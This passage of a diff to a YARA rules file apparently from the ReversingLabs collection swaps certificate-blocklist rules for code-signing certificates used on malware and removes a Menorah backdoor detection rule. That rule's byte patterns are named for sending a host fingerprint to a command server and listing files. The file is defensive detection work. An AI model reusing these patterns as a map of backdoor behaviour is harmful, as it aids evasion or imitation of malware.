-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L17160-L17178"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "60acdbad8ad3e1d4a863ce160d93abd0b5e2b214858cba84f7a1b907d2491486"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10218-L10236"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "895983bcb7f3a0c5ce54504f4a2ff8d652137434b8951380d756de6556d0844e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22255,21 +46920,21 @@ rule REVERSINGLABS_Cert_Blocklist_88346267057C0A82E2F39851D1B9694C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Hudson LLC" and ( pe.signatures [ i ] . serial == "00:88:34:62:67:05:7c:0a:82:e2:f3:98:51:d1:b9:69:4c" or pe.signatures [ i ] . serial == "88:34:62:67:05:7c:0a:82:e2:f3:98:51:d1:b9:69:4c" ) and 1595376000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SPSLTD PLYMOUTH LTD" and ( pe.signatures [ i ] . serial == "00:db:95:b2:23:62:d4:6a:73:c3:9e:0a:c9:24:88:3c:5b" or pe.signatures [ i ] . serial == "db:95:b2:23:62:d4:6a:73:c3:9e:0a:c9:24:88:3c:5b" ) and 1621296000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_A46F9D8784778Baa48167C48Bbc56F30 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0C48732873Ac8Ccebaf8F0E1E8329Cec : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "72d36a5f-6599-5456-ac67-0589e37bd035"
+		id = "b531341a-e8ac-5b56-a202-3c072f5d2ce0"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L17180-L17198"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "fffb6309355bc6764b0ab033db5964599c86c9a2f6d8985975a07f6b3ebb40ed"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10238-L10254"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7c9476a4119e013c8bb3c14b607090d592feaa5f2fc0f78d810555681d4a3733"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22279,21 +46944,21 @@ rule REVERSINGLABS_Cert_Blocklist_A46F9D8784778Baa48167C48Bbc56F30 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Mapping OOO" and ( pe.signatures [ i ] . serial == "00:a4:6f:9d:87:84:77:8b:aa:48:16:7c:48:bb:c5:6f:30" or pe.signatures [ i ] . serial == "a4:6f:9d:87:84:77:8b:aa:48:16:7c:48:bb:c5:6f:30" ) and 1618963200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Hermetica Digital Ltd" and pe.signatures [ i ] . serial == "0c:48:73:28:73:ac:8c:ce:ba:f8:f0:e1:e8:32:9c:ec" and 1618272000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_525B5529Db20D17A85Be284D6B7952Ea : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_C51F4Cf4D82Bc920421E1Ad93E39D490 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "52cdf082-7212-53e6-9e55-b86153e6afe8"
+		id = "727aba82-c908-51a6-9f1f-7fd8df424d8c"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L17200-L17216"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8fd406004b634e4826659b1dff88c61074fd321969b9fd63ea45d8e9608b35f1"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10256-L10274"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "cef717e7fe3eb0fb958d405caaf98fa51b22b150ccbf1286d3b4634e9df81ade"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22303,21 +46968,21 @@ rule REVERSINGLABS_Cert_Blocklist_525B5529Db20D17A85Be284D6B7952Ea : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Buster Ind Com Imp e Exp de Acessorios P Autos Ltda" and pe.signatures [ i ] . serial == "52:5b:55:29:db:20:d1:7a:85:be:28:4d:6b:79:52:ea" and 1508198400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CUT AHEAD LTD" and ( pe.signatures [ i ] . serial == "00:c5:1f:4c:f4:d8:2b:c9:20:42:1e:1a:d9:3e:39:d4:90" or pe.signatures [ i ] . serial == "c5:1f:4c:f4:d8:2b:c9:20:42:1e:1a:d9:3e:39:d4:90" ) and 1644624000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_70Ae0E517D2Ef6D5Eed06B56730A1A9A : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_C96086F1894E6420D2B4Bdeea834C4D7 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "98c19385-555e-5827-b03c-59645ad2a101"
+		id = "1268461b-676c-59b8-80c1-c54dbe1a265f"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L17218-L17234"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "017eed878daf706eb96b638a8d1f4428466bc1d00ce27f32628bd249a658a813"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10276-L10294"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "949bbd41ad4c83a05c1f004786cd296e2af80a3a559955ec90a4675cdfa04258"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22327,21 +46992,21 @@ rule REVERSINGLABS_Cert_Blocklist_70Ae0E517D2Ef6D5Eed06B56730A1A9A : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "70:ae:0e:51:7d:2e:f6:d5:ee:d0:6b:56:73:0a:1a:9a" and 1475193600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THE FAITH SP Z O O" and ( pe.signatures [ i ] . serial == "00:c9:60:86:f1:89:4e:64:20:d2:b4:bd:ee:a8:34:c4:d7" or pe.signatures [ i ] . serial == "c9:60:86:f1:89:4e:64:20:d2:b4:bd:ee:a8:34:c4:d7" ) and 1644969600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_57C3717C5E2Ce9A2E0Cf0340C03F458E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_06Fa27A121Cc82230C3013Ee634B6C62 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "47207784-5aee-5fa3-bed9-2c12d9932c38"
+		id = "4520e544-7a41-5dde-b90b-46cf3349297c"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L17236-L17252"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "fd710146874528c43ad8a9f847b7704c44ba4564cf79e20e6b23aa98b0ee2ea5"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10296-L10312"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "23ac7a97e7632536ed27cf9078b6bc1a734f1e991a20a228734b45117582f367"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22351,21 +47016,21 @@ rule REVERSINGLABS_Cert_Blocklist_57C3717C5E2Ce9A2E0Cf0340C03F458E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Citizen Travel Ltd" and pe.signatures [ i ] . serial == "57:c3:71:7c:5e:2c:e9:a2:e0:cf:03:40:c0:3f:45:8e" and 1450915200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Zimmi Consulting Inc" and pe.signatures [ i ] . serial == "06:fa:27:a1:21:cc:82:23:0c:30:13:ee:63:4b:6c:62" and 1645142401 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0761110Efe0B688C469D687512828C1F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_9Dd3B2F7957Ba99F4B04Fcdbe03B7Aac : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e8575a71-124b-5040-91b1-ccad371e10da"
+		id = "25229478-e891-5e0a-b738-6ca1fdd0012c"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L17254-L17270"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0ba60e1f58c7335ba5aa261031d09ee83a0ee51e05f8f26078b2a5c776ad0add"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10314-L10332"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d4f1b75dddd47fe8a19bd8e794b4930bdcaf54d63db57422db0a9b631d4f488d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22375,21 +47040,21 @@ rule REVERSINGLABS_Cert_Blocklist_0761110Efe0B688C469D687512828C1F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ENP Games Co., Ltd." and pe.signatures [ i ] . serial == "07:61:11:0e:fe:0b:68:8c:46:9d:68:75:12:82:8c:1f" and 1433721600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DOD MEDIA LIMITED" and ( pe.signatures [ i ] . serial == "00:9d:d3:b2:f7:95:7b:a9:9f:4b:04:fc:db:e0:3b:7a:ac" or pe.signatures [ i ] . serial == "9d:d3:b2:f7:95:7b:a9:9f:4b:04:fc:db:e0:3b:7a:ac" ) and 1646438400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_08Aa03F385F870E3A6D243B74B1Dadf6 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_061051Ff2A8Afab10347A6F1Ff08Ecb6 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "64aa17fe-676d-5c6e-babc-15b5e8dc72bb"
+		id = "4e23648f-9770-53ad-9c62-6e6239a02aa7"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L17272-L17288"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ef49a28a93d31c55dd2dfd3bec645f757a0a1a7eb8718ce92cf47bf9af126aed"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10334-L10350"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "db3ac3ee326c60e9abc94a2fb53d801637f044e7ab72d69e53958799e48747b7"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -22399,34001 +47064,9745 @@ rule REVERSINGLABS_Cert_Blocklist_08Aa03F385F870E3A6D243B74B1Dadf6 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE4\\xB8\\x9C\\xE8\\x8E\\x9E\\xE5\\xB8\\x82\\xE8\\x85\\xBE\\xE4\\xBA\\x91\\xE8\\xAE\\xA1\\xE7\\xAE\\x97\\xE6\\x9C\\xBA\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "08:aa:03:f3:85:f8:70:e3:a6:d2:43:b7:4b:1d:ad:f6" and 1352678400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TACHOPARTS SP Z O O" and pe.signatures [ i ] . serial == "06:10:51:ff:2a:8a:fa:b1:03:47:a6:f1:ff:08:ec:b6" and 1606435200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Menorah : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_Eda2429083Bfafb04E6E7Bdda1B08834 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Menorah backdoor."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4f13a6c6-bd97-58aa-ac3b-399866b5c63b"
-		date = "2024-05-10"
-		modified = "2024-05-10"
+		id = "0f5852c4-7866-5e12-97e9-c73972def6c5"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/backdoor/ByteCode.MSIL.Backdoor.Menorah.yara#L1-L169"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "770aefca192ceb3a778c0b1259105ace8e64cb35d0c34acb15c45fb6f22ad94b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10352-L10370"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "4f7d5c6929fe364c8868fddb28dd7bbf7cdcf3896d57836466af1a538190d11c"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "Menorah"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$send_fingerprint_to_c2_p1 = {
-            28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A
-            73 ?? ?? ?? ?? 19 1F 0E 6F ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 1F 5B 13 ?? 12 ?? 28 ?? ??
-            ?? ?? 1F 40 13 ?? 12 ?? 28 ?? ?? ?? ?? 1F 40 13 ?? 12 ?? 28 ?? ?? ?? ?? 1F 5D 13 ??
-            12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 1B 8D ?? ?? ?? ?? 25 16 1F 5B 13 ?? 12 ?? 28 ??
-            ?? ?? ?? A2 25 17 1F 40 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 18 06 A2 25 19 1F 40 13 ??
-            12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 5D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 0B 28 ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 0C 72 ?? ?? ?? ?? 0D 1F 3F 13 ?? 12
-            ?? 28 ?? ?? ?? ?? 17 16 28 ?? ?? ?? ?? 1F 3D 13 ?? 12 ?? 28 ?? ?? ?? ?? 17 16 28 ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 03 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 74 ?? ?? ?? ??
-            13 ?? 11 ?? 1F 50 13 ?? 12 ?? 28 ?? ?? ?? ?? 1F 4F 13 ?? 12 ?? 28 ?? ?? ?? ?? 1F 53
-            13 ?? 12 ?? 28 ?? ?? ?? ?? 1F 54 13 ?? 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ??
-            ?? ?? 11 ?? 1F 21 8D ?? ?? ?? ?? 25 16 1F 61 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 17 1F
-            70 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 18 1F 70 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 19 1F
-            6C 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1B 1F
-            63 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 1F 61 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1D 1F
-            74 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1E 1F 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 09
-        }
-		$send_fingerprint_to_c2_p2 = {
-            1F 6F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0A 1F 6E 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25
-            1F 0B 1F 2F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0C 1F 78 13 ?? 12 ?? 28 ?? ?? ?? ??
-            A2 25 1F 0D 1F 2D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0E 1F 77 13 ?? 12 ?? 28 ?? ??
-            ?? ?? A2 25 1F 0F 1F 77 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 10 1F 77 13 ?? 12 ?? 28
-            ?? ?? ?? ?? A2 25 1F 11 1F 2D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 12 1F 66 13 ?? 12
-            ?? 28 ?? ?? ?? ?? A2 25 1F 13 1F 6F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 14 1F 72 13
-            ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 15 1F 6D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 16 1F
-            2D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 17 1F 75 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F
-            18 1F 72 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 19 1F 6C 13 ?? 12 ?? 28 ?? ?? ?? ?? A2
-            25 1F 1A 1F 65 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 1B 1F 6E 13 ?? 12 ?? 28 ?? ?? ??
-            ?? A2 25 1F 1C 1F 63 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 1D 1F 6F 13 ?? 12 ?? 28 ??
-            ?? ?? ?? A2 25 1F 1E 1F 64 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 1F 1F 65 13 ?? 12 ??
-            28 ?? ?? ?? ?? A2 25 1F 20 1F 64 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 6F ??
-            ?? ?? ?? 11 ?? 08 8E 69 6A 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 25 08 16 08 8E 69 6F
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 25
-            6F ?? ?? ?? ?? 0D 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 13 ?? DE ?? 26 7E ?? ?? ?? ?? 13
-            ?? DE ?? 11
-        }
-		$get_files_and_directories_p1 = {
-            11 ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 8E 69 17 31 ??
-            11 ?? 17 9A 13 ?? 11 ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 1F 0F 8D
-            ?? ?? ?? ?? 25 16 1F 44 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 17 1F 69 13 ?? 12 ?? 28 ??
-            ?? ?? ?? A2 25 18 1F 72 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 19 1F 65 13 ?? 12 ?? 28 ??
-            ?? ?? ?? A2 25 1A 1F 63 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1B 1F 74 13 ?? 12 ?? 28 ??
-            ?? ?? ?? A2 25 1C 1F 6F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1D 1F 72 13 ?? 12 ?? 28 ??
-            ?? ?? ?? A2 25 1E 1F 79 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 09 1F 20 13 ?? 12 ?? 28
-            ?? ?? ?? ?? A2 25 1F 0A 1F 6F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0B 1F 66 13 ?? 12
-            ?? 28 ?? ?? ?? ?? A2 25 1F 0C 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0D 11 ?? A2
-            25 1F 0E 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28
-            ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 73 ?? ?? ?? ??
-            13 ?? 1F 0B 8D ?? ?? ?? ?? 25 16 11 ?? A2 25 17 11 ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 1F
-            16 8D ?? ?? ?? ?? 25 16 1F 4D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 17 1F 4D 13 ?? 12 ??
-            28 ?? ?? ?? ?? A2 25 18 1F 2F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 19 1F 64 13 ?? 12 ??
-            28 ?? ?? ?? ?? A2 25 1A 1F 64 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1B 1F 2F 13 ?? 12 ??
-            28 ?? ?? ?? ?? A2 25 1C 1F 79 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1D 1F 79 13 ?? 12
-        }
-		$get_files_and_directories_p2 = {
-            28 ?? ?? ?? ?? A2 25 1E 1F 79 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F 79 13 ?? 12
-            ?? 28 ?? ?? ?? ?? A2 25 1F 0A 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0B 1F 68 13
-            ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0C 1F 68 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0D 1F
-            3A 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0E 1F 6D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F
-            0F 1F 6D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 10 1F 3A 13 ?? 12 ?? 28 ?? ?? ?? ?? A2
-            25 1F 11 1F 73 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 12 1F 73 13 ?? 12 ?? 28 ?? ?? ??
-            ?? A2 25 1F 13 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 14 1F 74 13 ?? 12 ?? 28 ??
-            ?? ?? ?? A2 25 1F 15 1F 74 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 1F 3C 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 44
-            13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1B 1F 49 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 1F 52
-            13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1D 1F 3E 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1E 72 ??
-            ?? ?? ?? A2 25 1F 09 11 ?? 6F ?? ?? ?? ?? A2 25 1F 0A 72 ?? ?? ?? ?? A2 28 ?? ?? ??
-            ?? 13 ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 11 ?? 13 ?? 16 13 ?? 38
-            ?? ?? ?? ?? 11 ?? 11 ?? 9A 73 ?? ?? ?? ?? 13 ?? 1F 0C 8D ?? ?? ?? ?? 25 16 11 ?? A2
-            25 17 11 ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 1F 16 8D ?? ?? ?? ?? 25 16 1F 4D 13 ?? 12 ??
-            28 ?? ?? ?? ?? A2 25 17 1F 4D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 18 1F 2F 13 ?? 12 ??
-            28 ?? ?? ?? ?? A2 25 19 1F 64 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 64 13 ?? 12 ??
-            28 ?? ?? ?? ?? A2 25 1B 1F 2F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 1F 79 13 ?? 12 ??
-            28 ?? ?? ?? ?? A2 25 1D 1F 79 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1E 1F 79 13 ?? 12 ??
-            28 ?? ?? ?? ?? A2 25 1F 09 1F 79 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0A 1F 20 13
-        }
-		$get_files_and_directories_p3 = {
-            12 ?? 28 ?? ?? ?? ?? A2 25 1F 0B 1F 68 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0C 1F 68
-            13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0D 1F 3A 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0E
-            1F 6D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0F 1F 6D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25
